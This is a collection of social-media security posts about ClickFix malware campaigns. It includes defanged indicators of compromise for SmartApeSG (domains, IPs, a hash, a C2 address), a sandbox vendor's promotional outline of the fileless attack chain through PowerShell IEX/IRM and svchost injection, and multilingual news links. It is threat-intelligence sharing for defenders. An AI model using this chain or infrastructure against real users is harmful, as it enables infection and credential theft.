2026-05-20 (Wednesday): #SmartApeSG #ClickFix activity

SMARTAPESG TRAFFIC TRIGGERED FROM LEGITIMATE BUT COMPROMISED SITE:

- hxxps[:]//vividanchorlab[.]top/auth/rate-script.js
- hxxps[:]//vividanchorlab[.]top/auth/dashboard-schema.php
- hxxps[:]//vividanchorlab[.]top/auth/routerr-client.js

TRAFFIC FROM RUNNING SMARTAPESG CLICKFIX TEXT:

- hxxp[:]//178.156.222[.]131/
- hxxp[:]//5.78.144[.]156/
- hxxps[:]//astralharborworks[.]com/ground

SHA256 HASH FOR DOWNLOADED ZIP ARCHIVE:

- 6e3663c509debeda6c9f9faa260963973aa3e11f4fce21f9e8ff3ae45f785c20

POST-INFECTION C2 TRAFFIC:

- tcp://89.110.110[.]119:443

cc: @monitorsg

🚨 𝗟𝗲𝗴𝗶𝘁𝗶𝗺𝗮𝘁𝗲 𝗕𝟮𝗕 𝗪𝗲𝗯𝘀𝗶𝘁𝗲𝘀 𝗔𝗯𝘂𝘀𝗲𝗱 𝗳𝗼𝗿 𝗙𝗶𝗹𝗲𝗹𝗲𝘀𝘀 𝗠𝗮𝗹𝘄𝗮𝗿𝗲 𝗗𝗲𝗹𝗶𝘃𝗲𝗿𝘆: 𝗗𝗲𝘁𝗲𝗰𝘁 𝗜𝘁 𝗘𝗮𝗿𝗹𝘆
We’re tracking widespread #ClickFix activity using compromised legitimate websites to deliver fileless malware, lowering suspicion and delaying detection.

⚠️ Finance, banking, healthcare, manufacturing, and tech are among the most exposed industries.

❗️ The activity looks low-risk until fileless execution and outbound C2 traffic are already established. Attackers inject a lightweight inline JavaScript loader into compromised sites, which retrieves a second-stage payload directly into the victim’s browser from external infrastructure.

The attack chain blends into normal web traffic, relies on PowerShell and in-memory execution, and later shifts C2 communication into the legitimate system process svchost.exe, making malicious activity harder to distinguish from routine system behavior for SOC and MSSP teams.

⚡️ #ANYRUN Sandbox helps teams validate suspicious activity faster and contain fileless attacks before they escalate. Analysts can observe the full execution chain in real time:
Inline JS loader ➡️ User-executed PowerShell (IEX/IRM) ➡️ Hidden second-stage PowerShell and loader retrieval ➡️ Fileless in-memory execution inside powershell.exe ➡️ Follow-on .NET payload delivery ➡️ svchost.exe injection ➡️ Custom TCP C2 🚨

👨‍💻 Learn how #ANYRUN helps security teams detect complex threats and contain incidents faster: https://any.run/enterprise/?utm_source=mastodon&utm_medium=post&utm_campaign=clickfix_fileless_malware&utm_content=linktoenterprise&utm_term=200526

📈 Scale your SOC with solutions trusted by 74 Fortune 100 companies. Get an exclusive 10th anniversary deal for your team: https://app.any.run/plans/?utm_source=mastodon&utm_medium=post&utm_campaign=clickfix_fileless_malware&utm_content=linktoplans&utm_term=200526

IOCs:
/jsrepo?rnd=
/teamrepo?rnd=

ntdnewtds[.]shop
dnsnewtds[.]shop
sdntds[.]shop
newtdsone[.]shop
nttdss[.]shop
Dntds[.]shop

178[.]16[.]52[.]232
158[.]94[.]208[.]92
158[.]94[.]208[.]104
91[.]92[.]243[.]161

#cybersecurity #infosec

Cybercriminals Leverage ClickFix with PySoxy for Persistent Attacks

Cybercriminals are using a potent combination of ClickFix and PySoxy to launch persistent attacks, with experts warning that their deliberate preparation shows a sinister intent for continued access. This sophisticated tactic allows attackers to survive removal attempts and endpoint blocks, making it a major threat.

https://osintsights.com/cybercriminals-leverage-clickfix-with-pysoxy-for-persistent-attacks?utm_source=mastodon&utm_medium=social

#Clickfix #Pysoxy #SocialEngineering #PersistentAttacks #MalwareOperations

Nueva campaña ClickFix "Claude Code on Mac" de malware para macOS usando anuncios de Google y chats compartidos legítimos en Claude

#ciberseguridad #macOSSecurity #IA #ClickFix

https://mecambioamac.com/campana-clickfix-para-macos-usando-google-ads-y-chats-legitimos-de-claude/

Punto Informatico: ClickFix: Microsoft scopre nuovi attacchi contro macOS

Microsoft ha descritto tre attacchi ClickFix che installano infostealer per macOS in grado di aggirare le protezioni e rubare numerosi dati sensibili.
The post ClickFix: Microsoft scopre nuovi attacchi contro macOS appeared first on Punto Informatico.

ClickFix: Microsoft discovers new attacks against macOS

Microsoft has described three ClickFix attacks that install infostealers for macOS, capable of bypassing protections and stealing numerous sensitive data.

#ClickFix #Microsoft

https://www.punto-informatico.it/clickfix-microsoft-scopre-nuovi-attacchi-contro-macos/

'ClickFix' attack tricks users into hacking themselves, ACSC warns:

"Verify that you are human" prompt used to deliver Vidar Stealer malware.

The Australian Cyber Security Centre (ACSC) has stepped in to warn users of an active attack campaign targeting Windows users with Vidar Stealer malware, which is delivered through the so-called ClickFix social engineering technique.

🤷 https://www.itnews.com.au/news/clickfix-attack-tricks-users-into-hacking-themselves-acsc-warns-625692

#clickfix #acsc #malware #vidar #stealing #VidarStealer #australia #socialengineering

Microsoft researchers warn of a new #ClickFix campaign targeting macOS with fake guides on Medium and Craft to deploy AMOS and SHub Stealer via Terminal commands.

Read: https://hackread.com/fake-macos-troubleshooting-sites-steal-icloud-clickfix/

#CyberSecurity #macOS ##AMOS #SHubStealer #Scam

#Australia warns of #ClickFix attacks pushing #VidarStealer #malware

https://www.bleepingcomputer.com/news/security/australia-warns-of-clickfix-attacks-pushing-vidar-stealer-malware/

#cybersecurity

Wchodzisz na stronę juwenaliów… a tu taka niespodzianka [możliwa infekcja malware]

Patryk przesłał nam informację o infekcji strony rzeszowskiejuwenalia[.]pl Nasz czytelnik odwiedził tę stronę i natknął się na taki widok: Sam obrazek jeszcze niewiele zdradza, ale… po kliknięciu strona prosiła aby nacisnąć kolejno klawisze: Windows+R, Ctrl+V oraz enter. O co tutaj technicznie chodzi? Po kliknięciu: I’m not a robot – strona...

#WBiegu #Awareness #Clickfix #Infekcja #Malware #Socjotechnika

https://sekurak.pl/wchodzisz-na-strone-juwenaliow-a-tu-taka-niespodzianka-mozliwa-infekcja-malware/